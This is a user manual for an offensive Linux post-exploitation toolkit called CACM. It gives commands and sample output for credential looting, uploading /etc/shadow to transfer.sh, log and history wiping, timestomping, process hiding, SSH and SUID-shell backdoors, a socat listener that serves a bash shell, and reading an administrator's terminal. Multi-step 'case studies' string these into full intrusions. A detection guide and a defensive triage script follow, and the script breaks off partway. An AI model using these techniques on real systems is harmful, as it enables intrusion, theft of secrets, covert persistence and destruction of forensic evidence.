transfer file.txt --service oshi.at

# Set expiration time
transfer file.txt --expire 7d

# Encrypted upload
transfer sensitive.txt --encrypt

# Batch upload
transfer *.log

# Compress before upload
transfer /large/directory --compress

Example:

CACM> transfer /etc/passwd
[*] Uploading /etc/passwd...
[*] Using service: transfer.sh
[*] File size: 2.1KB
[+] Upload successful!
[*] Download URL: https://transfer.sh/abc123/passwd
[*] URL expires in: 14 days
[*] Direct download: curl https://transfer.sh/abc123/passwd

CACM> transfer /var/log --compress
[*] Compressing directory: /var/log
[*] Archive size: 15.2MB
[*] Uploading compressed archive...
[+] Upload successful!
[*] Download URL: https://bashupload.com/xyz789/logs.tar.gz

10. Security Detection and Evasion Module

edr - EDR/AV Detection

Function: Detect EDR and antivirus software products in the system

ATT&CK: T1518.001 (Security Software Discovery)

Usage:

# Detect all security products
edr

# Verbose mode
edr -v

# Detect specific types
edr --type av
edr --type edr
edr --type firewall

# Output to file
edr -o security_products.txt

# Silent mode
edr --quiet

Example:

CACM> edr
[*] Scanning for EDR/AV security products...
[*] Checking running processes...
[*] Checking installed software...
[*] Checking system services...

🛡️  Detected Security Products:
[+] CrowdStrike Falcon (EDR)
    Process: falconctl
    Service: CSFalconService
    Status: Running

[+] Windows Defender (AV)
    Process: MsMpEng.exe
    Service: WinDefend
    Status: Running

[+] Symantec Endpoint Protection (AV/EDR)
    Process: ccSvcHst.exe
    Service: SepMasterService
    Status: Running

⚠️  Recommendations:
- High detection risk environment
- Consider stealth techniques
- Avoid suspicious process names

lpe - Privilege Escalation Detection

Function: Download and run linPEAS/winPEAS to enumerate privilege escalation paths. The scripts are fetched onto the target and are widely signatured by AV/EDR, so expect alerts in monitored environments.

ATT&CK: T1068 (Exploitation for Privilege Escalation)

Usage:

# Run privilege escalation detection
lpe

# Specify detection type
lpe --linux
lpe --windows

# Verbose output
lpe -v

# Fast scan
lpe --fast

# Output to file
lpe -o privesc_report.txt

# Check specific categories only
lpe --check sudo
lpe --check suid
lpe --check capabilities

Example:

CACM> lpe
[*] Starting privilege escalation enumeration...
[*] Downloading linPEAS...
[*] Running comprehensive checks...

🔍 System Information:
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] Architecture: x86_64

⚠️  Potential Privilege Escalation Vectors:

🔴 SUID Binaries:
[+] /usr/bin/sudo (CVE-2021-3156 - Baron Samedit)
[+] /usr/bin/pkexec (CVE-2021-4034 - PwnKit)

🟡 Writable Files:
[+] /etc/passwd (world-writable!)
[+] /var/log/auth.log (group-writable)

🟢 Sudo Permissions:
[+] alice ALL=(root) NOPASSWD: /usr/bin/systemctl

💡 Recommendations:
1. Exploit sudo vulnerability (CVE-2021-3156)
2. Check systemctl sudo permissions
3. Investigate writable /etc/passwd

loot - Credentials and Secrets Collection

Function: Display common secrets and credentials information

ATT&CK: T1552.001 (Credentials In Files)

Usage:

# Collect all credentials
loot

# Specify types
loot --passwords
loot --keys
loot --tokens
loot --certificates

# Search specific paths
loot --path /home /opt

# Verbose mode
loot -v

# Output to file
loot -o credentials.txt

# Include history files
loot --include-history

Example:

CACM> loot
[*] Collecting credentials and secrets...
[*] Scanning common locations...

🔑 SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /home/bob/.ssh/id_ed25519 (Ed25519)
[+] /root/.ssh/authorized_keys (3 keys)

🔐 Password Files:
[+] /etc/shadow (readable!)
[+] /var/backups/passwd.bak
[+] /home/alice/.mysql_history (contains passwords)

🎫 Tokens & API Keys:
[+] /home/alice/.aws/credentials
[+] /opt/app/.env (DATABASE_PASSWORD=secret123)
[+] /var/log/app.log (JWT tokens in logs)

📜 Certificates:
[+] /etc/ssl/private/server.key
[+] /home/alice/.cert/client.p12

💾 Browser Data:
[+] /home/alice/.mozilla/firefox/profiles/cookies.sqlite
[+] /home/bob/.config/google-chrome/Default/Login Data

⚠️  High-Value Targets Found: 12

11. Timestamp Manipulation Module

notime - Timestamp Disguised Execution

Function: Run a command while the system clock is temporarily set to the given file's modification time, so files the command creates inherit that timestamp (requires root). Stepping the wall clock affects every process on the host for the duration, auditd time-change rules (adjtimex, settimeofday, clock_settime) record it, the jump shows in journal timestamps, and NTP will correct the clock afterwards.

ATT&CK: T1070.006 (Timestomp)

Usage:

# Execute command using file timestamp
notime /etc/passwd "touch /tmp/hidden_file"

# Verbose mode
notime /var/log/syslog "echo 'stealth' > /tmp/log" -v

# Specify timestamp type
notime /etc/hosts "ls -la" --mtime
notime /etc/hosts "ls -la" --atime
notime /etc/hosts "ls -la" --ctime

Example:

CACM> notime /etc/passwd "touch /tmp/backdoor"
[*] Target file: /etc/passwd
[*] File mtime: 2024-01-10 08:30:15
[*] Command: touch /tmp/backdoor
[*] Setting system time to: 2024-01-10 08:30:15
[+] Command executed at target timestamp
[*] Restoring system time...
[+] Timestamp manipulation completed

# Check result
$ ls -la /tmp/backdoor
-rw-r--r-- 1 root root 0 Jan 10 08:30 /tmp/backdoor

ctime - Modify File Change Time

Function: Set a file's ctime (inode change time, not creation time) to its mtime (requires root). Linux has no syscall that sets ctime directly, which is why root is needed: this is typically done by manipulating the system clock or the on-disk inode, and both leave their own traces.

ATT&CK: T1070.006 (Timestomp)

Usage:

# Modify single file
ctime /tmp/suspicious_file

# Batch modify
ctime /tmp/*.log

# Recursively modify directory
ctime -r /var/log/

# Verbose mode
ctime -v /tmp/file

# Backup original timestamps
ctime --backup /tmp/file

Example:

CACM> ctime /tmp/malware.exe
[*] Processing: /tmp/malware.exe
[*] Original ctime: 2024-01-15 10:30:00
[*] Target mtime: 2024-01-10 08:15:30
[+] ctime updated successfully
[*] File now appears created at: 2024-01-10 08:15:30

notime_cp - Timestamp Preserving Copy

Function: Copy files while preserving all timestamps (birth-time, ctime, mtime, atime). Only atime and mtime can be set through the normal file API (utimensat); matching ctime and birth time as the example output shows requires root and the same clock or raw-inode tricks as ctime and notime above.

ATT&CK: T1070.006 (Timestomp)

Usage:

# Basic copy
notime_cp source.txt destination.txt

# Copy directory
notime_cp -r /source/dir /dest/dir

# Verbose mode
notime_cp -v source.txt dest.txt

# Preserve all attributes
notime_cp -a source.txt dest.txt

# Force overwrite
notime_cp -f source.txt existing_dest.txt

Example:

CACM> notime_cp /etc/passwd /tmp/passwd_backup
[*] Copying with timestamp preservation...
[*] Source: /etc/passwd
[*] Destination: /tmp/passwd_backup
[*] Preserving: birth-time, ctime, mtime, atime
[+] Copy completed with full timestamp preservation

# Verify timestamps
$ stat /etc/passwd /tmp/passwd_backup
  File: /etc/passwd
  Birth: 2024-01-01 00:00:00.000000000
  Modify: 2024-01-10 08:30:15.123456789
  Change: 2024-01-10 08:30:15.123456789
  Access: 2024-01-15 10:25:30.987654321

  File: /tmp/passwd_backup
  Birth: 2024-01-01 00:00:00.000000000  # Identical
  Modify: 2024-01-10 08:30:15.123456789  # Identical
  Change: 2024-01-10 08:30:15.123456789  # Identical
  Access: 2024-01-15 10:25:30.987654321  # Identical

12. Log Cleaning Module

xlog - Log Cleaning Tool

Function: Remove lines matching a pattern from log files, or clear systemd journal entries. Two caveats: journalctl itself only rotates or vacuums whole journal files (there is no per-entry delete), and anything already forwarded by rsyslog, auditd, or a remote collector is untouched. The backup file the tool writes (see the example) is itself an artifact.

ATT&CK: T1070.002 (Indicator Removal: Clear Linux or Mac System Logs)

Usage:

# Remove lines containing specific pattern from file
xlog /var/log/auth.log "192.168.1.100"

# Clean multiple log files
xlog /var/log/*.log "suspicious_activity"

# Clear systemd journal
xlog --systemd

# Clear specific service logs
xlog --systemd --service ssh

# Clear logs from specific time range
xlog --systemd --since "2024-01-15 10:00:00"

# Backup before cleaning
xlog --backup /var/log/auth.log "failed_login"

# Regular expression pattern
xlog -E /var/log/access.log "192\.168\.1\.(100|101|102)"

# Verbose mode
xlog -v /var/log/syslog "error"

Example:

CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Processing: /var/log/auth.log
[*] Pattern: 192.168.1.100
[*] Scanning file for matching lines...
[+] Found 15 matching lines
[*] Creating backup: /var/log/auth.log.backup.20240115
[*] Removing matching lines...
[+] Removed 15 lines containing '192.168.1.100'
[*] File cleaned successfully

CACM> xlog --systemd --service ssh
[*] Clearing systemd journal for service: ssh
[*] Journal size before: 45.2MB
[+] SSH service logs cleared
[*] Journal size after: 42.1MB
[*] Cleared 3.1MB of SSH logs

13. Advanced Scanning Module

np - Advanced Secret Scanner

Function: Advanced secret scanner with Chinese support

ATT&CK: T1552.001 (Credentials In Files)

Usage:

# Basic scan
np /path/to/scan

# Scan specific file types
np --type config /etc/

# Chinese support scan
np --chinese /var/log/

# Deep scan
np --deep /home/

# Formatted output (recommended with less -R)
np /etc/ | less -R

# Scan specific patterns
np --pattern password /var/

# Exclude specific directories
np --exclude /proc,/sys /

# Output to file
np /home/ -o secrets_report.txt

Example:

CACM> np /etc/ | less -R
[*] Advanced secret scanner with Chinese support
[*] Scanning: /etc/
[*] Patterns: passwords, keys, tokens, Chinese secrets

🔍 Configuration Files:
📁 /etc/mysql/my.cnf
   🔑 Line 15: password = secret123
   🔑 Line 23: root_password = admin456

📁 /etc/nginx/nginx.conf
   🎫 Line 45: ssl_certificate_key /etc/ssl/private/server.key

🔍 Chinese Content:
📁 /etc/app/config.ini
   🔐 Line 8: 数据库密码 = mysecret123
   🔐 Line 12: API密钥 = abc123def456

🔍 Environment Files:
📁 /etc/environment
   🎫 Line 3: AWS_SECRET_ACCESS_KEY=xyz789abc123

[+] Total secrets found: 6
[+] High-risk items: 3

🎯 Real-World Case Studies

Case 1: Complete Internal Network Penetration

# 1. Initial information gathering
CACM> ws -v -o system_info.txt
[*] Collecting comprehensive system information...
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] CPU: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (4 cores)
[+] Memory: 8GB total, 2.1GB available
[+] Network interfaces: eth0 (192.168.1.50), docker0 (172.17.0.1)
[+] Domain: company.local

# 2. Security product detection
CACM> edr
[*] Scanning for security products...
[+] No EDR detected
[+] Basic firewall: ufw (inactive)
[⚠] Low security environment detected

# 3. Network discovery and port scanning
CACM> scan 192.168.1.0/24 -p 22,80,443,3389,445,3306 -t 100 -s
[*] Starting comprehensive network scan...
[+] 192.168.1.10:22   SSH-2.0-OpenSSH_7.4 (Ubuntu)
[+] 192.168.1.15:80   Apache/2.4.41 (Ubuntu)
[+] 192.168.1.15:3306 MySQL 8.0.25
[+] 192.168.1.20:443  nginx/1.18.0
[+] 192.168.1.25:3389 Microsoft Terminal Services
[+] 192.168.1.30:445  Samba 4.11.6

# 4. Domain information gathering
CACM> sub company.com
[*] Querying multiple sources...
[+] Found 67 subdomains:
mail.company.com (192.168.1.15)
vpn.company.com (203.0.113.10)
admin.company.com (192.168.1.20)
api.company.com (192.168.1.25)
db.company.com (192.168.1.15)

# 5. DNS information gathering
CACM> dns company.com MX
[+] MX: 10 mail.company.com
CACM> rdns 192.168.1.0/24 -t 20
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: web-db.company.local
[+] 192.168.1.20: admin-panel.company.local

# 6. Find writable directories
CACM> wfind
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /var/www/html/uploads (drwxrwxrwx) ⚠️

Case 2: Privilege Escalation and Persistence

# 1. Privilege escalation detection
CACM> lpe
[*] Running privilege escalation enumeration...
[🔴] CRITICAL: /usr/bin/sudo vulnerable to CVE-2021-3156
[🟡] SUID binary: /usr/bin/pkexec (potential CVE-2021-4034)
[🟢] Sudo permissions: alice ALL=(root) NOPASSWD: /usr/bin/systemctl

# 2. Download penetration tools
CACM> bin nmap socat nc pspy
[*] Downloading static binaries...
[+] nmap: 12.3MB downloaded to /tmp/nmap
[+] socat: 2.1MB downloaded to /tmp/socat
[+] nc: 1.5MB downloaded to /tmp/nc
[+] pspy: 3.2MB downloaded to /tmp/pspy

# 3. Create hidden working environment
CACM> xhome /dev/shm/.workspace
[+] Created hidden workspace: /dev/shm/.workspace
[+] Set permissions: 700
[+] Environment configured

# 4. Establish stealth backdoor
CACM> xtmux new -s persistence
[*] Created hidden tmux session: persistence
[+] Session will not appear in 'tmux list-sessions'

# Run backdoor in hidden session
CACM> xtmux send -s persistence "/tmp/socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash"

# 5. Hide critical processes
CACM> hide list
[*] Found processes to hide:
  PID: 15234 - socat TCP-LISTEN:4444
CACM> hide 15234
[+] Process 15234 hidden from ps, top, htop

# 6. Monitor administrator activity
CACM> tit list
[*] Found admin sessions:
  PID: 9999 - /bin/bash (user: root)
  PID: 8888 - /bin/bash (user: admin)
CACM> tit read 9999
[*] Monitoring root session...
[2024-01-15 14:30:00] systemctl status ssh
[2024-01-15 14:30:15] tail -f /var/log/auth.log
[2024-01-15 14:30:30] mysql -u root -p

ssh_backdoor - SSH Backdoor User Management

Function: Create and manage SSH backdoor users for persistence

ATT&CK: T1136.001 (Create Account: Local Account)

Usage:

# Create SSH backdoor user
ssh_backdoor add backup_user

# List all backdoor users
ssh_backdoor list

# Remove backdoor user
ssh_backdoor remove backup_user

# Hide user (from who, w commands)
ssh_backdoor hide backup_user

# Test SSH connection
ssh_backdoor test backup_user

# Configure SSH service
ssh_backdoor config

suidshell - SUID Shell Backdoor

Function: Create SUID shell backdoor for privilege escalation

ATT&CK: T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Usage:

# Create SUID shell backdoor
suidshell create /tmp/.shell

# Delete SUID shell backdoor
suidshell delete /tmp/.shell

# List existing SUID shells
suidshell list

portmux - Port Multiplexing

Function: Implement port multiplexing for covert channels on existing service ports

ATT&CK: T1205 (Traffic Signaling)

Usage:

# Setup port multiplexing (multiplex port 22 as 4444)
portmux setup 22 4444 secret_trigger

# Activate port multiplexing
portmux activate target.com:22 secret_trigger

# Deactivate port multiplexing
portmux deactivate target.com:22 secret_trigger

# Test port multiplexing
portmux test target.com 22 secret_trigger

historydel - Command History Cleanup

Function: Delete shell command history records to remove operation traces

ATT&CK: T1070.003 (Indicator Removal: Clear Command History)

Usage:

# Delete specific line range from history
historydel 100-200

# Delete history containing specific keywords
historydel keyword "password"

# Clear entire history file
historydel clear

# Delete last N commands
historydel last 50

sshmon - SSH Monitoring and Data Transmission

Function: Monitor SSH connections and data transmission, record SSH session content

ATT&CK: T1040 (Network Sniffing)

Usage:

# Start SSH monitoring
sshmon start

# Start monitoring with custom output file
sshmon start --output /tmp/.ssh_logs

# Start encrypted monitoring
sshmon start --encrypt secret_key

# Start stealth mode monitoring
sshmon start --stealth --silent

# Check monitoring status
sshmon status

# View monitoring logs
sshmon logs

# View recent logs
sshmon logs --tail

# View raw logs
sshmon logs --raw

# Decrypt and view logs
sshmon logs --decrypt secret_key

# Stop monitoring
sshmon stop

# Clean all monitoring data
sshmon clean

Case 3: Data Collection and Stealth Exfiltration

# 1. Comprehensive credential collection
CACM> loot
[*] Collecting credentials and secrets...
[🔑] SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /root/.ssh/id_rsa (4096-bit RSA)
[🔐] Password Files:
[+] /etc/shadow (readable via sudo)
[+] /var/backups/passwd.bak
[🎫] API Keys & Tokens:
[+] /home/alice/.aws/credentials
[+] /opt/webapp/.env (DB_PASSWORD=secret123)

# 2. Advanced secret scanning
CACM> np /etc/ /home/ /opt/ | less -R
[🔍] Advanced scanning with Chinese support...
[+] /etc/mysql/my.cnf: password = mysql_secret_2024
[+] /home/bob/.bashrc: export API_KEY=sk-1234567890abcdef
[+] /opt/app/config.ini: 数据库密码 = chinese_secret_123

# 3. Search for specific files
CACM> find_subdomains company.com /var/log /etc
[+] Found in /etc/nginx/sites-available/default:
    api.company.com
    admin.company.com
    internal.company.com

# 4. Search for sensitive information
CACM> hgrep password /var/log/ /etc/ /home/
[📁] /var/log/mysql/error.log
   Line 245: Access denied for user 'backup'@'localhost' (using password: YES)
[📁] /etc/apache2/.htpasswd
   Line 1: admin:$apr1$xyz$encrypted_password_hash

# 5. Encrypt sensitive data
CACM> enc /home/alice/.ssh/id_rsa
[*] Encrypting with AES-256-GCM...
[+] Encrypted: /home/alice/.ssh/id_rsa.enc
CACM> enc /etc/shadow
[*] Encrypting system file...
[+] Encrypted: /tmp/.shadow.enc

# 6. Stealth data exfiltration
CACM> transfer /tmp/.shadow.enc --service transfer.sh --encrypt
[*] Double-encrypting for transfer...
[*] Uploading via transfer.sh...
[+] Upload successful!
[*] URL: https://transfer.sh/abc123/encrypted_data
[*] Auto-expires in: 14 days

# 7. Clean up traces
CACM> shred -u /home/alice/.ssh/id_rsa
[+] Original key securely deleted
CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Removed 23 lines containing attacker IP
CACM> xlog --systemd --service ssh
[*] Cleared SSH service logs (2.1MB removed)

# 8. Timestamp manipulation
CACM> notime_cp /etc/passwd /tmp/.backup_passwd
[*] Copied with full timestamp preservation
CACM> ctime /tmp/.shadow.enc
[*] Set ctime to match mtime (appears older)

Case 4: Network Proxy and Stealth Communication

# 1. Establish TCP proxy
CACM> xbounce :8080 internal.company.com:3306
[*] TCP proxy: 0.0.0.0:8080 -> internal.company.com:3306
[+] Proxy established for database access

# 2. Use ghost IP for scanning
CACM> xghostip 10.255.255.255 192.168.1.0/24 -scan
[*] Using non-existing source IP: 10.255.255.255
[*] Stealth scanning target network...
[+] Responses captured via raw sockets

# 3. Stealth SSH connection
CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected without leaving traces

# 4. Stealth file transfer
CACM> xscp --stealth /tmp/tools.tar.gz [email protected]:/tmp/.cache/
[*] Stealth SCP transfer initiated...
[*] Transfer completed: 15.2MB in 3.2s
[*] No logs generated on target system

# 5. Memory execution of tools
CACM> dl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | memexec
[*] Downloading linpeas.sh...
[*] Executing directly in memory...
[*] No disk artifacts created
[+] Memory execution completed

Case 5: Advanced Anti-Forensics Techniques

# 1. Timestamp manipulation
CACM> notime /etc/passwd "touch /tmp/backdoor.sh"
[*] Executing at /etc/passwd timestamp...
[*] System time: 2024-01-10 08:30:15
[+] Backdoor created with legitimate timestamp

# 2. Comprehensive log cleaning
CACM> xlog /var/log/auth.log "Failed password.*192\.168\.1\.100"
[*] Removing failed login attempts...
[+] Cleaned 15 authentication failures

CACM> xlog /var/log/apache2/access.log "192\.168\.1\.100"
[*] Removing web access logs...
[+] Cleaned 234 access log entries

CACM> xlog --systemd --since "2024-01-15 10:00:00"
[*] Clearing recent systemd logs...
[+] Removed 5.2MB of recent system logs

# 3. Secure file deletion
CACM> shred -n 7 -u /tmp/sensitive_data.txt
[*] 7-pass secure deletion...
[+] File completely unrecoverable

# 4. Process hiding verification
CACM> hide status
[*] Hidden processes:
  PID: 15234 - socat (hidden from: ps, top, htop, pgrep)
  PID: 16789 - nc (hidden from: ps, top, htop, pgrep)
[+] 2 processes successfully hidden

📋 Complete Command Reference

Information Gathering

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| sub | Subdomain discovery | T1590.002 | sub example.com |
| ws | System information collection | T1082 | ws -v -o info.txt |
| scan | Port scanning | T1046 | scan 192.168.1.0/24 -p 22,80,443 |
| dns | DNS queries | T1590.002 | dns example.com MX |
| rdns | Reverse DNS queries | T1590.002 | rdns 192.168.1.0/24 |
| xpty | Terminal user discovery | T1033 | xpty -v |
| edr | Security product detection | T1518.001 | edr --type av |

File Operations

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| wfind | Writable directory discovery | T1083 | wfind /tmp /var |
| hgrep | Advanced text search | T1083 | hgrep password /etc/ |
| find_subdomains | Subdomain file search | T1083 | find_subdomains company.com |
| enc | File encryption | T1027 | enc secret.txt |
| dec | File decryption | T1027 | dec secret.txt.enc |
| shred | Secure deletion | T1070.004 | shred -u sensitive.txt |
| np | Advanced secret scanner | T1552.001 | np /etc/ \| less -R |
| loot | Credential collection | T1552.001 | loot --passwords |

Network Tools

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| dl | Multi-protocol download | T1105 | dl https://example.com/file.txt |
| xbounce | TCP traffic forwarding | T1090.001 | xbounce :8080 target.com:80 |
| xghostip | Ghost IP operations | T1090.003 | xghostip 10.0.0.1 target.com |
| xssh | Stealth SSH connection | T1021.004 | xssh user@host --stealth |
| xscp | Stealth file transfer | T1021.004 | xscp --stealth file.txt user@host:/tmp/ |
| transfer | File upload service | T1567.002 | transfer file.txt --service transfer.sh |

Process Management

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| hide | Process hiding | T1014 | hide 1234 |
| tit | User input monitoring | T1056.001 | tit read 1234 |
| memexec | Memory execution | T1620 | memexec /usr/bin/id |
| xsu | User switching | T1134.001 | xsu root "id" |

System Persistence

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| xhome | Hidden working directory | T1564.001 | xhome /tmp/.workspace |
| xtmux | Hidden tmux sessions | T1564.001 | xtmux new -s hidden |
| bin | Tool download | T1105 | bin nmap curl jq |
| lpe | Privilege escalation detection | T1068 | lpe --fast |
| ssh_backdoor | SSH backdoor user | T1136.001 | ssh_backdoor add backup_user |
| suidshell | SUID shell backdoor | T1548.001 | suidshell create /tmp/.shell |
| portmux | Port multiplexing | T1205 | portmux setup 22 4444 secret_trigger |
| sshmon | SSH monitoring | T1040 | sshmon start |

Timestamp Operations

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| notime | Timestamp-disguised execution | T1070.006 | notime /etc/passwd "touch file" |
| ctime | Modify inode change time (ctime) | T1070.006 | ctime /tmp/file |
| notime_cp | Timestamp-preserving copy | T1070.006 | notime_cp source.txt dest.txt |

Log Cleaning

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| xlog | Log cleaning | T1070.002 | xlog /var/log/auth.log "pattern" |
| historydel | Command history cleanup | T1070.003 | historydel 100-200 |

Utility Tools

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| common | Common command collection | T1083 | common lt /var/log |

🔧 Environment Configuration

HS_TOKEN - Encryption Key

# Set encryption key. A literal on the command line lands in shell history; prompting for it avoids that
export HS_TOKEN="your_secret_key_here"
# ...or: read -rs HS_TOKEN && export HS_TOKEN
# Either way, root and every process the shell spawns can read it from /proc/<pid>/environ

# Use environment variable for encryption
echo "sensitive data" | enc

# Use environment variable for decryption
cat encrypted_file.enc | dec

CACM_HOME - Working Directory

# Set CACM working directory
export CACM_HOME="/tmp/.cacm_workspace"

# Tool will automatically use this directory for temporary files

⚠️ Important Considerations

1. Legal Usage

  • Authorized Testing Only: This tool is for authorized penetration testing and security research only
  • Comply with Laws: Strictly comply with local laws and regulations, do not use for illegal activities
  • Obtain Clear Authorization: Must obtain clear written authorization from target system owners before use
  • Document Testing Activities: Recommend detailed documentation of all testing activities for analysis and reporting

2. Permission Requirements

  • Root Permission Functions: The following functions require root permissions
    • notime - Timestamp disguised execution
    • ctime - Modify inode change time (ctime is the last status-change time, not the creation time; it cannot be set through utimes, which is why root is needed)
    • notime_cp - Complete timestamp copying
    • hide - Process hiding (some functions)
    • xlog --systemd - systemd log cleaning
  • Regular User Functions: Most functions can run under regular user permissions
  • Privilege Escalation: Use lpe command to detect privilege escalation opportunities

3. Environment Compatibility

  • Primary Support: Linux systems (Ubuntu, CentOS, Debian, RHEL, etc.)
  • Partial Support: macOS (some functions may be limited)
  • Not Supported: Windows systems (recommend using WSL)
  • Architecture Support: x86_64, ARM64

4. Detection Evasion

  • Stealth Mode: Most commands provide stealth options (such as --stealth)
  • Process Hiding: hide command can hide critical processes
  • Log Cleaning: xlog command can clean operation traces
  • Timestamp Manipulation: Timestamp operation commands can disguise file timestamps (mtime, atime and ctime)
  • ⚠️ Note: Cannot guarantee 100% stealth, advanced EDR may still detect

5. Data Security

  • Encryption Strength: Uses AES-256-GCM encryption algorithm
  • Key Management: Properly manage HS_TOKEN environment variable
  • Key Loss: Lost keys will make encrypted data unrecoverable
  • Secure Deletion: Use shred command to securely delete sensitive files; as the shred man page notes, overwriting in place is only effective on filesystems that write in place, not on data-journaled, copy-on-write (btrfs, ZFS) or snapshotted volumes, and SSD wear levelling can keep old copies of the blocks

6. Network Security

  • Proxy Usage: Recommend using proxy or VPN for network functions
  • Traffic Encryption: Use encrypted protocols for network transmission when possible
  • IP Spoofing: xghostip sends from a spoofed source address; replies go to that address, so they are only captured when the host is on the same segment or otherwise on the return path, and the ghost IP must be unused on that network
  • Connection Stealth: SSH/SCP commands provide stealth connection options

7. Performance Impact

  • Resource Consumption: Some functions (like large-scale scanning) may consume significant system resources
  • Network Bandwidth: File transfer and download functions will occupy network bandwidth
  • Disk Space: Tool downloads and logging require sufficient disk space
  • Recommendation: Verify performance impact in test environment first

8. Troubleshooting

  • Permission Errors: Check if you have sufficient permissions to execute specific functions
  • Network Issues: Confirm network connection and firewall settings
  • Missing Dependencies: Some functions may require system dependency packages
  • Version Compatibility: Ensure system version is compatible with the tool

🚨 Incident Response Guide

Detecting CACM Tool Usage

If you are a system administrator or security analyst, the indicators below help detect CACM usage. Keep in mind that the tool's own xlog, historydel, hide and timestamp commands target exactly the local sources these checks read, so treat text logs, shell history, ps output and file timestamps on the host as possibly edited, and corroborate with sources the tool cannot reach from the host: forwarded syslog, network captures, and a second collection path such as /proc.

1. File System Indicators

# Hidden directories in the staging locations the tool defaults to (xhome, CACM_HOME)
find /tmp /var/tmp /dev/shm -mindepth 1 -name ".*" -type d 2>/dev/null

# Files named after the tool (case-insensitive, so one pattern covers cacm and CACM)
find /tmp /var/tmp /dev/shm -iname "*cacm*" 2>/dev/null

# Recently modified executables in world-writable locations. mtime and ctime can be forged with
# notime_cp/ctime; birth time (%w) survives a cp -p style copy, so a %w later than %y/%z is a lead
find /tmp /var/tmp /dev/shm -type f -executable -mtime -1 -exec stat -c '%w %y %z %n' {} + 2>/dev/null

# SUID/SGID files outside the packaged binary paths (suidshell drops these in places like /tmp/.shell)
find / -xdev -type f \( -perm -4000 -o -perm -2000 \) \
  -not -path "/usr/*" -not -path "/bin/*" -not -path "/sbin/*" -not -path "/lib*" 2>/dev/null

2. Process Monitoring

# Listeners and reverse shells; match the executable name, since a bare "nc" substring also matches rsync, sync and others
ps -eo pid,user,etime,comm,args | grep -Ew "socat|nc|ncat|netcat" | grep -v grep

# Processes hidden from ps/top/htop (the hide command): PIDs present in /proc that ps does not report
comm -23 <(ls /proc | grep -E '^[0-9]+$' | sort) <(ps -eo pid= | tr -d ' ' | sort)

# Userland hiding usually works through a preloaded library; this file should not normally exist
cat /etc/ld.so.preload 2>/dev/null

# tmux sockets: the default is /tmp/tmux-<uid>/default; a session that does not show in `tmux ls`
# is normally on a different socket path, so list every socket in the staging directories
ls -la /tmp/tmux-*/ 2>/dev/null
find /tmp /var/tmp /dev/shm -type s 2>/dev/null

# Another process reading a terminal (tit): trace only the relevant syscalls instead of grepping everything
strace -f -e trace=ptrace,process_vm_readv -p <suspicious_pid>

3. Network Monitoring

# Listening sockets with their owning process (ss replaces netstat; -p needs root)
ss -tulpn | grep -E ":(4444|8080|1080)\b"

# A LISTEN socket with no owner shown while running as root means the owner is hidden from the /proc scan (or it is a kernel socket)
ss -tlnpH | grep -v "users:"

# The kernel socket table is not affected by ps-level hiding: state 0A is LISTEN, the port is hex (printf '%d\n' 0x115C gives 4444)
awk 'NR>1 && $4=="0A" {print $2, "inode", $10}' /proc/net/tcp

# DNS queries to the lookup services sub uses (only meaningful on a host the tool runs from; -l line-buffers the pipe)
tcpdump -i any -l port 53 | grep -E "(crt\.sh|ip\.thc\.org)"

# Non-standard established/listening connections (-n -P keep addresses and ports numeric so the filter works)
lsof -i -n -P | grep -E "(LISTEN|ESTABLISHED)" | grep -vE ":(22|80|443)[ -]"
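The one-liners above each read a single source. The script below is an added example written for this guide (it is not part of CACM and uses none of its code): it takes a second collection path for each artifact the page documents, so that ps-level hiding, a forged timestamp or an edited log on the host does not blind the check. The pure functions accept already-collected data and are exercised on constructed samples; the staging-directory list, the packaged-binary prefixes and the sample /proc/net/tcp and passwd excerpts are assumptions for illustration, not tool output.

```python
"""Host triage for the artifacts this page documents: processes hidden from ps
(hide), listeners that survive process hiding, SUID shells in staging
directories (suidshell) and added accounts (ssh_backdoor).
Added example for this guide, not CACM code. collect_live() gathers real data
on a Linux host (root gives full coverage)."""
import os
import stat
import subprocess

STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")          # assumed staging locations
PACKAGED_BIN = ("/usr/", "/bin/", "/sbin/", "/lib", "/snap/")  # assumed "normal" SUID homes

# Constructed /proc/net/tcp excerpt: sshd on 22, a listener on 4444 (0x115C), one established connection
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 67890 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 67891 1 0000000000000000 20 4 30 10 -1
"""

# Constructed /etc/passwd excerpt: a second UID-0 user and an account homed in /dev/shm
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
backup_user:x:0:0::/home/backup_user:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
svc:x:1001:1001::/dev/shm/.workspace:/bin/sh
"""


def hidden_pids(proc_pids, ps_pids):
    """PIDs listed in /proc but missing from ps. Userland hiding (typically a
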